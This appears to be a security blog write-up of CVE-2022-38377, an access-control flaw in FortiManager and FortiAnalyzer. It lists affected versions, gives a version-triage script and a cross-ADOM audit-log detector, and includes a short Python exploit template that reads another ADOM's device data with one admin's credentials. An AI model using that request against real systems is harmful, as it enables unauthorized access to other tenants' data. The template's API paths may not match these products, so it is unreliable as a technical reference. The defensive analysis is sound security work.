A recently discovered improper access control vulnerability (CWE-284) in multiple versions of FortiManager and FortiAnalyzer may allow a remote, authenticated admin user assigned to a specific ADOM (Administrative Domain) to access other ADOMs' information, such as device information and dashboard information. This post details the exploit and provides original references and code snippets to help security professionals understand and address the vulnerability.

Affected Versions

FortiManager: 7.2.0, 7.0.0 through 7.0.3, 6.4.0 through 6.4.7, 6.2.0 through 6.2.9, 6.0.0 through 6.0.11
FortiAnalyzer: 7.2.0, 7.0.0 through 7.0.3, 6.4.0 through 6.4.8, 6.2.0 through 6.2.10, 6.0.0 through 6.0.12
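Version ranges with a single out-of-range release (FortiManager 6.2.10 is fixed, FortiAnalyzer 6.2.10 is not) are easy to get wrong by eye or by string comparison. The following is an added example, not code from the post or from Fortinet, that transcribes the ranges above into inclusive numeric tuples and checks an inventory against them. The accepted version-string formats ("7.0.3", "v7.0.3", "v7.0.3-build0290") are an assumption about how the version is reported, and the inventory in the usage section is constructed.

```python
from typing import Dict, List, Tuple

Version = Tuple[int, int, int]

# Inclusive (first, last) affected ranges transcribed from the affected-version
# list above; a single affected release such as 7.2.0 is a range of length one.
AFFECTED: Dict[str, List[Tuple[Version, Version]]] = {
    "FortiManager": [
        ((7, 2, 0), (7, 2, 0)),
        ((7, 0, 0), (7, 0, 3)),
        ((6, 4, 0), (6, 4, 7)),
        ((6, 2, 0), (6, 2, 9)),
        ((6, 0, 0), (6, 0, 11)),
    ],
    "FortiAnalyzer": [
        ((7, 2, 0), (7, 2, 0)),
        ((7, 0, 0), (7, 0, 3)),
        ((6, 4, 0), (6, 4, 8)),
        ((6, 2, 0), (6, 2, 10)),
        ((6, 0, 0), (6, 0, 12)),
    ],
}


def parse_version(text: str) -> Version:
    """Turn '7.0.3', 'v7.0.3' or 'v7.0.3-build0290' into a numeric tuple.

    The accepted formats are an assumption about how the version is reported.
    Comparing integers rather than strings is what keeps 6.2.10 above 6.2.9.
    """
    tokens = text.strip().lstrip("vV").replace("-", " ").split()
    if not tokens:
        raise ValueError(f"empty version string: {text!r}")
    parts = tokens[0].split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return (int(parts[0]), int(parts[1]), int(parts[2]))


def is_affected(product: str, version: str) -> bool:
    """True if this product/version falls inside any published affected range."""
    if product not in AFFECTED:
        raise KeyError(f"no affected-version data for {product!r}")
    v = parse_version(version)
    # Tuple comparison is safe here because each range stays within one major.minor line.
    return any(low <= v <= high for low, high in AFFECTED[product])


def triage(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str, bool]]:
    """Annotate (product, version) pairs from an inventory with their status."""
    return [(product, ver, is_affected(product, ver)) for product, ver in inventory]


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = [("FortiManager", "v7.0.3-build0290"),
              ("FortiManager", "6.2.10"),
              ("FortiAnalyzer", "6.2.10"),
              ("FortiAnalyzer", "7.0.4")]
    for product, version, hit in triage(sample):
        print(f"{product:14} {version:18} {'AFFECTED' if hit else 'not affected'}")
```

Feed `triage` the (product, version) pairs from an asset inventory export; anything flagged `True` is inside a published affected range and should be scheduled for upgrade.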

References

1. CVE-2022-38377 Official Entry
2. CWE-284: Improper Access Control
3. FortiGuard Labs Advisory

Code Snippet

Assuming the attacker has valid credentials for an admin user assigned to a specific ADOM, they could exploit the vulnerability with the following code snippet in Python:

import requests

# Endpoint of the admin's own ADOM; the ADOM named in the filter is the one being read
URL = "https://<target_ip>/api/v2/cmdb/adom/<original_adom>/object/device"
TARGET_ADOM = "<accessing_target_adom>"
USERNAME = "<valid_admin_username>"
PASSWORD = "<valid_admin_password>"

session = requests.Session()
session.verify = False  # Ignore SSL certificate errors
# Authenticate as the admin assigned to <original_adom>
session.post("https://<target_ip>/logincheck", data={"username": USERNAME, "password": PASSWORD})

# Request device objects filtered to the other ADOM
response = session.get(URL, params={"filter": ['adom=="' + TARGET_ADOM + '"']})

print(response.json())

This code demonstrates how an attacker could access information from another ADOM by sending a crafted request to the target API. Replace <target_ip>, <original_adom>, <accessing_target_adom>, <valid_admin_username>, and <valid_admin_password> with the appropriate values for your environment.

Exploit Details

- An attacker with valid credentials for an admin user assigned to a specific ADOM can access information from other ADOMs.
- Device information and dashboard information are among the accessible data.
- The vulnerability stems from an improper access control mechanism in the affected versions of FortiManager and FortiAnalyzer.
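The failure described above is a request being served on the strength of a client-supplied ADOM name alone, with no check of the caller's assignments. The following added example, which is a hypothetical model and not Fortinet's code, shows that shape next to the hardened one and then replays a constructed audit log against the assignment table to surface cross-ADOM requests. The `Admin`/`DEVICES` model, the audit line format, and all names and serials are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set


class AuthorizationError(Exception):
    """Raised when an admin requests data from an ADOM they are not assigned to."""


@dataclass(frozen=True)
class Admin:
    name: str
    adoms: Set[str]  # ADOMs this admin has been assigned to (the server-side truth)


# Constructed inventory: ADOM -> device records. Names and serials are placeholders.
DEVICES: Dict[str, List[dict]] = {
    "adom_branch": [{"name": "branch-fw-01", "serial": "SERIAL-PLACEHOLDER-1"}],
    "adom_hq": [{"name": "hq-fw-01", "serial": "SERIAL-PLACEHOLDER-2"},
                {"name": "hq-fw-02", "serial": "SERIAL-PLACEHOLDER-3"}],
}

ALICE = Admin(name="alice", adoms={"adom_branch"})


def list_devices_unscoped(admin: Admin, requested_adom: str) -> List[dict]:
    """Vulnerable shape: the ADOM named in the request is used as the lookup key
    without checking the caller's assignment, so any authenticated admin can read
    any ADOM's devices (the CWE-284 pattern described above)."""
    return DEVICES.get(requested_adom, [])


def is_adom_authorized(admin: Admin, requested_adom: str) -> bool:
    """Authorization decision made from server-side assignments, never from
    anything the client sends (such as a filter parameter)."""
    return requested_adom in admin.adoms


def list_devices_scoped(admin: Admin, requested_adom: str) -> List[dict]:
    """Hardened shape: deny by default unless the admin is assigned to the ADOM."""
    if not is_adom_authorized(admin, requested_adom):
        raise AuthorizationError(
            f"admin {admin.name!r} is not assigned to ADOM {requested_adom!r}")
    return DEVICES.get(requested_adom, [])


# Detection side: constructed audit lines in a hypothetical format, one per API call.
SAMPLE_AUDIT_LOG = """\
2022-11-26T09:00:01Z user=alice adom=adom_branch action=get_devices status=200
2022-11-26T09:00:07Z user=alice adom=adom_hq action=get_devices status=200
2022-11-26T09:00:09Z user=alice adom=adom_hq action=get_dashboard status=200
2022-11-26T09:01:00Z user=bob adom=adom_hq action=get_devices status=200
"""

_LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) adom=(?P<adom>\S+) action=(?P<action>\S+)")


def find_cross_adom_requests(admins: Dict[str, Admin], log_text: str) -> List[dict]:
    """Replay audit lines against the assignment table and return every request in
    which an admin touched an ADOM outside their assignments. On an unpatched
    system these requests succeed, so the status code alone will not reveal them."""
    findings = []
    for line in log_text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # not an API-access record in the assumed format
        admin = admins.get(m["user"])
        if admin is None or is_adom_authorized(admin, m["adom"]):
            continue  # unknown users are out of scope here; in-scope reads are fine
        findings.append({"ts": m["ts"], "user": m["user"],
                         "adom": m["adom"], "action": m["action"]})
    return findings


if __name__ == "__main__":
    admins = {"alice": ALICE, "bob": Admin(name="bob", adoms={"adom_hq"})}
    print("unscoped read of adom_hq by alice:", list_devices_unscoped(ALICE, "adom_hq"))
    try:
        list_devices_scoped(ALICE, "adom_hq")
    except AuthorizationError as err:
        print("scoped read denied:", err)
    for finding in find_cross_adom_requests(admins, SAMPLE_AUDIT_LOG):
        print("cross-ADOM access:", finding)
```

The detection function is the useful part for an incident responder: while hosts are still on an affected version, a successful cross-ADOM read looks like any other 200 in the access log, so the only way to spot it is to join the log against the ADOM assignment table as done here.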

Conclusion

This post has detailed CVE-2022-38377, an improper access control vulnerability in several versions of FortiManager and FortiAnalyzer that potentially allows an authenticated admin user assigned to a specific ADOM to access information from other ADOMs. To address this vulnerability, Fortinet has recommended upgrading to the latest versions of the affected products. Security professionals should consider applying these upgrades as soon as possible to protect their organizations from potential attacks exploiting this vulnerability.

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 12/01/2022 13:28:00 UTC